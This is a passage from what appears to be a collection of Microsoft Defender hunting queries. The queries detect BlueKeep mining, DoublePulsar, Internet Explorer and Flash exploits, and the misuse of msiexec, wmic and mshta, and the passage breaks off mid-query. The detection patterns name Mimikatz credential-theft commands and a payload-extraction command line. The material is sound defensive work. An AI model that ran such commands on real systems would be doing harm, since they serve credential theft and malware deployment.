    ) on DeviceId , InitiatingProcessG1ParentFileName , InitiatingProcessG1ParentId, InitiatingProcessG1ParentCreationTime
// 4th iteration of join
| join kind=leftouter (
    DeviceProcessEvents
    | where Timestamp > ago(timeframe)
    | project DeviceId, InitiatingProcessFileName=FileName,InitiatingProcessSHA1=SHA1, InitiatingProcessId=ProcessId, InitiatingProcessCommandLine=ProcessCommandLine, InitiatingProcessCreationTime=ProcessCreationTime,
        InitiatingProcessParentFileName=InitiatingProcessFileName,InitiatingProcessParentSHA1=InitiatingProcessSHA1, InitiatingProcessParentId=InitiatingProcessId, InitiatingProcessParentCommandLine=InitiatingProcessCommandLine, InitiatingProcessParentCreationTime=InitiatingProcessCreationTime
    ) on DeviceId , InitiatingProcessParentFileName , InitiatingProcessParentId, InitiatingProcessParentCreationTime
// 5th iteration of join
| join kind=leftouter (
    DeviceProcessEvents
    | where Timestamp > ago(timeframe)
    | project Timestamp, DeviceId, FileName,SHA1, ProcessId, ProcessCommandLine, ProcessCreationTime, InitiatingProcessFileName,InitiatingProcessSHA1, InitiatingProcessId, InitiatingProcessCommandLine, InitiatingProcessCreationTime
    ) on DeviceId , InitiatingProcessFileName , InitiatingProcessId, InitiatingProcessCreationTime
);
// Use the cached results and find the rare patterns based on process names.
_process_tree_data
| summarize count() by FileName,InitiatingProcessFileName,InitiatingProcessParentFileName,InitiatingProcessG1ParentFileName,InitiatingProcessG2ParentFileName,InitiatingProcessG3ParentFileName,InitiatingProcessG4ParentFileName
| where count_ < 10 // If the count of a pattern is less than 10, it is anomalous. Threshold can be changed.
// Now, join the anomalous patterns with the original results to get the details.
| join kind=inner _process_tree_data on FileName,InitiatingProcessFileName,InitiatingProcessParentFileName,InitiatingProcessG1ParentFileName,InitiatingProcessG2ParentFileName,InitiatingProcessG3ParentFileName,InitiatingProcessG4ParentFileName
// Use the deepest known creation time in the chain as the row timestamp.
| project Timestamp=case(isnotempty(Timestamp),Timestamp,isnotempty(InitiatingProcessParentCreationTime),InitiatingProcessParentCreationTime,isnotempty(InitiatingProcessG1ParentCreationTime),InitiatingProcessG1ParentCreationTime, isnotempty(InitiatingProcessG2ParentCreationTime),InitiatingProcessG2ParentCreationTime,isnotempty(InitiatingProcessG3ParentCreationTime),InitiatingProcessG3ParentCreationTime,InitiatingProcessG4ParentCreationTime),
    count_ , DeviceId, DeviceName,
    InitiatingProcessG4ParentFileName,InitiatingProcessG3ParentFileName,InitiatingProcessG2ParentFileName,InitiatingProcessG1ParentFileName,InitiatingProcessParentFileName,InitiatingProcessFileName,FileName,
    InitiatingProcessG4ParentCommandLine, InitiatingProcessG3ParentCommandLine, InitiatingProcessG2ParentCommandLine, InitiatingProcessG1ParentCommandLine, InitiatingProcessCommandLine, ProcessCommandLine,
    InitiatingProcessG4ParentId, InitiatingProcessG4ParentCreationTime,
    InitiatingProcessG3ParentId, InitiatingProcessG3ParentFolderPath ,InitiatingProcessG3ParentSHA1, InitiatingProcessG3ParentCreationTime,
    InitiatingProcessG2ParentId,InitiatingProcessG2ParentFolderPath,InitiatingProcessG2ParentSHA1, InitiatingProcessG2ParentCreationTime,
    InitiatingProcessG1ParentId,InitiatingProcessG1ParentFolderPath,InitiatingProcessG1ParentSHA1, InitiatingProcessG1ParentCreationTime,
    InitiatingProcessParentId, InitiatingProcessParentFolderPath,InitiatingProcessParentSHA1, InitiatingProcessParentCommandLine ,InitiatingProcessParentCreationTime,
    InitiatingProcessId, InitiatingProcessSHA1, InitiatingProcessCreationTime,
    ProcessId, SHA1, ProcessCreationTime
| order by Timestamp, DeviceName, InitiatingProcessG4ParentCreationTime , InitiatingProcessG3ParentCreationTime , InitiatingProcessG2ParentCreationTime , InitiatingProcessG1ParentCreationTime , InitiatingProcessCreationTime
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | v | |
| Execution | v | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | v | |
| Lateral movement | v | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Cyb3rMonk ([Medium](https://mergene.medium.com/), [GitHub](https://github.com/Cyb3r-Monk), [Twitter](https://twitter.com/Cyb3rMonk))

================================================
FILE: Execution/detect-bluekeep-related-mining.md
================================================
# Detect BlueKeep-related cryptocurrency mining

This query was originally published in the threat analytics report, *Exploitation of CVE-2019-0708 (BlueKeep)*.
[CVE-2019-0708](https://nvd.nist.gov/vuln/detail/CVE-2019-0708), also known as BlueKeep, is a critical remote code execution vulnerability involving RDP. Soon after its disclosure, the NSA issued a rare [advisory](https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/1865726/nsa-cybersecurity-advisory-patch-remote-desktop-services-on-legacy-versions-of/) about this vulnerability, out of concern that it could be used to quickly spread malware. Attackers have since used this vulnerability to [install cryptocurrency miners](https://www.wired.com/story/bluekeep-hacking-cryptocurrency-mining/) on targets.

Microsoft has issued [updates](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708) for this vulnerability, as well as [guidance](https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708) for protecting operating systems that we no longer support. Microsoft Defender ATP also contains [behavioral detections](https://www.microsoft.com/security/blog/2019/11/07/the-new-cve-2019-0708-rdp-exploit-attacks-explained/) for defending against this threat.

The following query locates devices where the known coin miner payload was dropped.

## Query

```Kusto
// Suggest setting Timestamp starting from September 6th
// when the BlueKeep Metasploit module was released
DeviceFileEvents
| where Timestamp > ago(7d)
| where FolderPath endswith "spool\\svchost.exe" or SHA1=="82288c2dc5c63c1c57170da91f9979648333658e"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Detect BlueKeep exploitation attempts](../Initial%20access/detect-bluekeep-exploitation-attempts.md)
* [Detect suspicious RDP activity related to BlueKeep](../Lateral%20Movement/detect-suspicious-rdp-connections.md)
* [Detect command-and-control communication related to BlueKeep cryptomining](../Command%20and%20Control/c2-bluekeep.md)

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Execution/detect-doublepulsar-execution.md
================================================
# Detect DoublePulsar execution

This query was originally published in the threat analytics report, *Motivated miners*.

[Doublepulsar](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/DoublePulsar&threatId=-2147239036) is a backdoor developed by the National Security Agency (NSA). First [disclosed in 2017](https://www.scmagazine.com/home/security-news/cybercrime/doublepulsar-malware-spreading-rapidly-in-the-wild-following-shadow-brokers-dump/), it is now used by many malicious actors. Software [patches](https://support.microsoft.com/en-us/help/4013389/title) are available.

The following query detects possible DoublePulsar execution events. See [Detect web server exploitation by DoublePulsar](detect-web-server-exploit-doublepulsar.md) for a query that detects behaviors associated with campaigns that use DoublePulsar.
## Query

```Kusto
//DoublePulsar execution
DeviceProcessEvents
| where Timestamp > ago(7d)
| where SHA1 == "be855cd1bfc1e1446a3390c693f29e2a3007c04e"
    or (ProcessCommandLine contains "targetport"
        and ProcessCommandLine contains "targetip"
        and (ProcessCommandLine contains "payload" or ProcessCommandLine contains "verifybackdoor"))
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Execution/detect-exploitation-of-cve-2018-8653.md
================================================

# Detect exploitation of the Internet Explorer remote code execution vulnerability, CVE-2018-8653

This query was originally published in the threat analytics report, *CVE-2018-8653 scripting engine vulnerability*.

[CVE-2018-8653](https://nvd.nist.gov/vuln/detail/CVE-2018-8653) is a remote code execution vulnerability found in the scripting engine for several releases of Internet Explorer. An attacker exploiting this CVE could use a malicious webpage to gain the same access rights as the currently logged-in user, which is particularly problematic if the user is an administrator. Microsoft has since [addressed](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8653) this vulnerability.

The following query detects possible exploitation of this CVE.
## Query

```Kusto
DeviceProcessEvents
| where Timestamp > ago(7d)
    and InitiatingProcessFileName =~ "svchost.exe"
    and InitiatingProcessCommandLine contains "WinHttpAutoProxySvc"
    and FileName !~ "pacjsworker.exe"
    and FileName !~ "svchost.exe"
    and FileName !~ "WerFault.exe"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | v | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Execution/detect-malcious-use-of-msiexec.md
================================================

# Detect malicious use of Msiexec

This query was originally published in the threat analytics report, *Msiexec abuse*.

*[Msiexec.exe](https://docs.microsoft.com/windows-server/administration/windows-commands/msiexec)* is a Windows component that installs files with the *.msi* extension. These kinds of files are Windows installer packages, and are used by a wide array of legitimate software. However, malicious actors can re-purpose msiexec.exe for living-off-the-land attacks, where they use legitimate system binaries on the compromised device to perform attacks.

The following queries detect activity associated with misuse of msiexec.exe, particularly alongside [mimikatz](https://www.varonis.com/blog/what-is-mimikatz/), a common credential dumper and privilege escalation tool.
## Query

```Kusto
//Find possible download and execution using Msiexec
DeviceProcessEvents
| where Timestamp > ago(7d)
//MSIExec
| where FileName =~ "msiexec.exe" and
//With domain in command line
(ProcessCommandLine has "http" and ProcessCommandLine has "return")

//Find PowerShell running files from the temp folder
DeviceProcessEvents
| where Timestamp > ago(7d)
//Looking for PowerShell
| where FileName =~ "powershell.exe"
//Looking for %temp% in the command line indicating deployment
and ProcessCommandLine contains "%temp%"

//Find credential theft attempts using Msiexec to run Mimikatz commands
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName =~ "msiexec.exe"
//Mimikatz commands
and (ProcessCommandLine contains "privilege::" or ProcessCommandLine has "sekurlsa" or ProcessCommandLine contains "token::")
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | v | |
| Defense evasion | | |
| Credential Access | v | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Execution/detect-malicious-rar-extraction.md
================================================

# Detect CVE-2018-15982 exploit used to extract file from malicious RAR archive

This query was originally published in the threat analytics report, *CVE-2018-15982 exploit attacks*.
[CVE-2018-15982](https://nvd.nist.gov/vuln/detail/CVE-2018-15982) is a vulnerability in Adobe Flash Player that allows remote execution of arbitrary code. It has since been [patched](https://helpx.adobe.com/security/products/flash-player/apsb18-42.html). Actors have been observed using this vulnerability in targeted attacks. Exploits for CVE-2018-15982 have also been included in several exploit kits.

In some initial attacks exploiting CVE-2018-15982, attackers sent targets spear-phishing emails. The emails would include an attached RAR archive, which contained a lure document, as well as a second archive disguised as a *.jpg* file. Opening the document would automatically run an embedded Flash ActiveX control. This, in turn, would call a script containing the exploit. The exploit's ability to run arbitrary code would be employed to unpack and run a payload from the second archive. The payload is a backdoor used both to achieve persistence and for command and control.

The following query detects possible instances of a payload being extracted by the exploit.

## Query

```Kusto
DeviceProcessEvents
| where FileName == "cmd.exe"
| where ProcessCommandLine contains @"set path=%ProgramFiles(x86)%\WinRAR;C:\Program Files\WinRAR;"
| where ProcessCommandLine contains @"cd /d %~dp0 & rar.exe e -o+ -r -inul*.rar"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | v | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Execution/detect-office-products-spawning-wmic.md
================================================

# Detect Office products launching wmic.exe

This query was originally published in the threat analytics report, *Ursnif (Gozi) continues to evolve*.

[Windows Management Instrumentation](https://docs.microsoft.com/windows/win32/wmisdk/about-wmi), or *WMI*, is a legitimate Microsoft framework used to obtain management data and perform administrative tasks on remote devices. However, attackers can also use WMI to gather information about a target or hijack control of a device. The MITRE ATT&CK framework includes [WMI](https://attack.mitre.org/techniques/T1047/) among its list of common enterprise attack techniques.

The following query detects when Microsoft Office software spawns an instance of the WMI command-line utility, *[wmic.exe](https://docs.microsoft.com/windows/win32/wmisdk/wmic)*.

## Query

```Kusto
// Office products spawning WMI
DeviceProcessEvents
| where InitiatingProcessFileName in~ ("winword.exe", "excel.exe", "outlook.exe")
    and FileName =~ "wmic.exe"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | v | The query will detect whenever a Microsoft Office product spawns an instance of wmic.exe. This sort of activity, although suspicious, is not by itself actively harmful. Administrators should investigate further to determine if the event was malicious. |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Execution/detect-suspicious-mshta-usage.md
================================================

# Detect suspicious Mshta usage

This query was originally published in the threat analytics report, *Ursnif (Gozi) continues to evolve*.

[Microsoft HTML Applications](https://docs.microsoft.com/previous-versions/ms536496(v=vs.85)), or *HTAs*, are executable files that use the same technologies and models as Internet Explorer, but do not run inside of a web browser. *[Mshta.exe](https://docs.microsoft.com/en-us/previous-versions/windows/embedded/aa940701(v%3dwinembedded.5))* is a Windows utility that provides a host for HTA files to run in. Although it has legitimate uses, attackers can use mshta.exe to run malicious JavaScript or VBScript commands. The MITRE ATT&CK framework includes [Mshta](https://attack.mitre.org/techniques/T1170/) among its list of enterprise attack techniques.

The following query detects when mshta.exe has been run, which might include illegitimate usage by attackers.

## Query

```Kusto
// mshta.exe script launching processes
DeviceProcessEvents
| where Timestamp > ago(7d)
    and InitiatingProcessFileName =~ 'mshta.exe'
    and InitiatingProcessCommandLine contains '